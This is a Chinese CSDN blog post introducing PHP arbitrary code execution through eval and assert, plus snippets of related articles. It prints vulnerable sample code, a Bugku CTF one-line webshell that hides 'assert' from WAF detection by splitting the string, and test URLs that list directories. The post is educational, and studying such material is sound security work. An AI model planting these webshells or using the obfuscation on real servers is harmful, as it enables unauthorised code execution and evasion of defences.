php任意代码执行漏洞浅析

最新推荐文章于 2024-07-19 19:21:17 发布

Hydra.

最新推荐文章于 2024-07-19 19:21:17 发布

阅读量6.9k

点赞数

本文链接：https://blog.csdn.net/qq_40657585/article/details/84285844

版权

漏洞成因

当应用在调用一些能将字符转化为代码的函数(如PHP中的eval,assert)时，没有考虑用户是否能控制这个字符串，这就会造成代码执行漏洞。

常见函数

php:eval,assert

python:exec

区别

eval与assert区别

eval函数中参数是字符，如：

eval('echo 1;');

assert函数中参数为表达式（或者为函数），如：

 assert(phpinfo())

漏洞利用

1.eval()函数

定义

eval函数把字符串按照php代码来计算。该字符串必须合法，且必须以分号结尾。如果代码字符串中没有返回语句，则返回NULL，如果代码中解析错误，返回false。

例子

<?php
$a = $_GET['a'];
eval($a);
?>

我们可以通过get方式传入一个字符串，由eval执行，就变成命令

http://127.0.0.1/test/1.php?a=var_dump(scandir('./'))

2.assert

定义

检查一个断言是否为false

例子

bugku的过狗一句话，可以试试

<?php 
$poc="a#s#s#e#r#t"; 
$poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
$poc_2($_GET['s']) 
?>

扫描当前目录

 http://123.206.87.240:8010/?s=var_dump(scandir(%27./%27))

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Hydra.

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

-----已搬运-------攻防世界：mfw --------assert() 闭合后的任意代码执行

Zero_Adam的博客

02-19

253

目录:一.学到的知识点：二、我的做题思路三、WP做法：一.学到的知识点： bool or die() 当前面的为真的时候，后面的就不执行了 assert()语法。的知识点如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行。跟eval()类似, 不过eval($assertion)只是执行符合php编码规范的$code_str assert(mixed $assertion, $exception) // 返回值为bool型 assert()会检查 assert

php--fpm任意代码执行复现

Sylon的博客

05-19

1637

0x00：前言：在长亭科技举办的 Real World CTF 中，国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现，向目标服务器 URL 发送 %0a 符号时，服务返回异常，疑似存在漏洞。在使用一些有错误的Nginx配置的情况下，通过恶意构造的数据包，即可让PHP-FPM执行任意代码。 0x01：漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞，使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞，可允许攻击者远程执行代码。向Ng.

参与评论您还未登录，请先登录后发表或查看评论

z-blog+php+漏洞,bo-blog index.php include任意php文件漏洞

weixin_27034523的博客

03-19

313

来源:[F.S.T]火狐技术联盟文章作者:我非我[F.S.T]漏洞发现日期:2005.6.13漏洞涉及版本:Bo-Blog Version <= 1.7.0108(未打补丁前)漏洞分析及利用:刚发现bo-blog的一个致命的漏洞。我是看1.7.0095版本的。不过估计最新的也有这个漏洞.在index.php中的job变量没有过滤.导致用户可以任意include一个php文件.index.ph...

PHP常见的攻击方式及其应对策略

最新发布

2401_86114846的博客

07-19

497

为了保障网站和应用的安全，我们需要了解这些攻击方式的特点和原理，并采取相应的应对策略进行防范。通过加强安全意识和采取有效的安全措施，我们可以降低PHP应用的安全风险，保护用户数据的安全和隐私。攻击者通过在输入字段中插入恶意的SQL代码，使得原本正常的SQL查询语句被改变，从而获取数据库中的敏感信息或者对数据库进行非法操作。攻击者通过在Web页面中插入恶意脚本，当用户浏览该页面时，恶意脚本会被执行，从而窃取用户信息或者对用户进行其他恶意操作。等），将恶意文件或代码包含到目标文件中，从而执行恶意操作。

漏洞复现篇——任意代码命令执行漏洞复现及防御

爱国小白帽

02-27

4005

什么是代码执行：当应用在调用一些能将字符串转化成代码的函数时，没有考虑用户是否能够控制这个字符串，将造成代码注入漏洞。代码执行函数：在php中：eval，assert,preg_replace(‘/*/e’, 'ret="1";′,ret = "\\1";',ret="1";′,data); 在asp中：eval, exevute,executeglobal 在jsp中：jsp中没有p...

web渗透之——任意代码执行漏洞

wsnbbz的博客

03-04

1496

漏洞原理当应用在调用一些能将字符串转化成代码的函数时，没有考虑用户是否能够控制这个字符串，将造成代码注入漏洞在php中： eval，assert，将字符串当成代码执行 preg_replace("/wslp/e","$xr",“wslp”);用第二个参数的执行结果替换第三个参数里的第一个参数指定的值漏洞形成如果被执行的字符串是通过前端参数传过来的攻击代码，或者数据库里被植入攻击代码数据，就...

ssrf漏洞php代码审计1

m0_55772907的博客

04-30

1094

（1）原理 web服务器经常需要从别的服务器获取数据，比如文件载入、图片拉取、图片识别等功能，如果获取数据的服务器地址可控，攻击者就可以通过web服务器自定义向别的服务器发出请求。因为web服务器常搭建在DMZ区域，因此常被攻击者当作跳板，向内网服务器发出请求。（2）分类 1)curl_exec 发现存在url传递。在这里提交url参数和内容，服务器用函数curl_exec()执行，并将结果输出在下面页面做测试发现可以正常跳转，所以可以在此去执行一些恶意操作。 2）file_get_co.

SSRF漏洞浅析+ctfhub简单实战

热门推荐

wo41ge的博客

03-27

1万+

花时间写一下SSRF 凑合看吧 2020/3/24 14.26 漏洞原理 SSRF（Server-Side Request Forgery:服务器端请求伪造）是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。正是因为恶意请求由服务端发起，而服务端能够请求到与自身相连而与外网隔绝的内部网络系统，所以一般情况下，SSRF的攻击目标是攻击者无法直接访问的内网系统。 ssrf csrf 重放攻击换行注入漏洞成因 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地

Java代码审计漏洞挖掘（入门）

Ms08067安全实验室

11-10

4668

出品｜MS08067实验室（www.ms08067.com）双十一最有意义的事情莫过于是学习一门高级渗透技术了！代码审计属于高级渗透测试服务的一环，顾名思义就是检查源代码中的安全缺陷，检查...

浅析文件上传漏洞

L_lemo004的博客

10-20

457

文章目录文件上传成因客户端校验服务器校验原理危害防御解析漏洞文件上传成因对于上传文件的后缀名（扩展名）没有做较为严格的限制对于上传文件的MIMETYPE 没有做检查权限上没有控制对于上传的文件的文件权限，（尤其是对于shebang类型的文件）对于web server对于上传文件或者指定目录的行为没有做限制客户端校验前段js验证可通过审计修改js代码或burp改包绕过服务器校验 content-type字段校验将Content-Type修改为image/gif，或者

浅析常见Debug调试器的安全隐患.pdf

09-18

Xdebug是PHP的调试扩展，它提供了丰富的调试功能，但同时也可能成为攻击者获取远程代码执行能力的途径。尽管文章没有详细展开Xdebug的利用细节，但提到了它作为PHP扩展的特点，以及它在协助调试和开发中的作用。综...

php 5.5.12 server 漏洞,漏洞预警 | ThinkPHP5远程命令执行漏洞

weixin_31597759的博客

04-11

672

php eval注入漏洞,CVE-2013-1349 openSIS ajax.php脚本eval注入漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客，安全资讯平台...

weixin_36403587的博客

03-13

239

### This module requires Metasploit: http//metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = ...

php漏洞eval,Web安全之代码执行漏洞

weixin_36440677的博客

03-11

1856

原标题：Web安全之代码执行漏洞内容1、代码执行漏洞的概述2、代码执行漏洞的危害3、代码执行漏洞的利用4、代码执行漏洞的防御背景介绍在Web应用中有时候程序员为了考虑灵活性、简洁性，会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时，没有考虑用户是否能控制这个字符串，将造成代码执行漏洞。例子PHP CMS中 settings的内容：array('upl...

第十一天任意代码执行漏洞

代码审计

03-16

1492

这里写目录标题一级目录二级目录三级目录一级目录二级目录三级目录在Web应用中有时候程序员为了考虑灵活性、简洁性，会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时，没有考虑用户是否能控制这个字符串，将造成代码执行漏洞。代码执行和命令执行代码执行后端语言执行 php java .net nodejs 命令执行调用系统接口面试喜欢问代码执行常见的函数代码执行各函数之间的特点代码执行如何修复 bypass disable fu nctiO

PHP代码函数的执行漏洞

知足且坚定，温柔且上进

04-07

1874

eval函数 eval()函数可以将参数中的变量值执行，通常处于处理模板和动态加载PHP代码，但也常常被攻击者利用，比如一句话后门程序： <?php eval($_GET[cmd])?> assert()函数 assert()函数在PHP中用来判断一个表达式是否成立，返回真或假。如果直接将PHP代码传入也会被执行。 <?php assert($_GET["cmd"]);?&g...

论一句话过WAF

http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm

03-07

1902

一．绕过方式木马存在敏感字符被拦截木马代码存在敏感字符，直接被waf。如：如直接传<?php @@eval($_POST['123']); ?>，由于存在eval危险函数直接被拦截。这时候需要对被waf的危险字符进行各种变形即可收集的过狗马，最大同性交友网站github也有很多webshell项目 $poc = "a#s#s#e#r#t"; $poc_1 = e......

BUGKU web22 assert注入漏洞

m0_49762339的博客

01-20

489

这道题和攻防世界那道/.git泄露差不多题目给了提示： <?PHP $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) $poc_1=assert $_GET=s 因此只需要构造payload=?s=XXX即可这里先尝试payload=?s=phpinfo();存在回显因

bugku的题目

weixin_44237647的博客

04-19

1675

矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 题目要求输入的不是一个数字或者数字字符串，但是值为1 可以采用 %00截断知识点是弱类型比较当数字与字符串比较或者运算时，会把字符串转换为数字。 https://www.cnblogs.com/Mr...

编译原理浅析：代码生成与优化

这个阶段通常发生在编译过程的末尾，它将经过优化的中间代码转化为特定机器架构下的可重定位机器代码或汇编代码，以便最终被链接器处理并生成可执行程序。编译器的工作可以分为多个阶段，这些阶段包括： 1. **...